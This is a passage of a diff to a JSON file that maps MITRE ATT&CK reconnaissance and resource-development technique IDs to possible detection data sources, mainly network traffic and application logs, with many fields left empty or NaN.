This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1595.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1595", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1594", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1593.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1593.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": 
NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1593", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1592.004", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1592.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1592.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1592.001", + 
"command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1592", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1591.004", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1591.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1591.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + 
"relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1591.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1591", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1590.006", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1590.005", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1590.004", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + 
"collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1590.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1590.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1590.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1590", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1589.003", + "command_list": [], + 
"commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1589.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1589.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1589", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1588.005", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + 
"target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1588.004", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1588.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1588.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1588.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1588", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + 
"data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1587.004", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1587.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1587.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1587.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1587", + "command_list": [], + "commands": [], + 
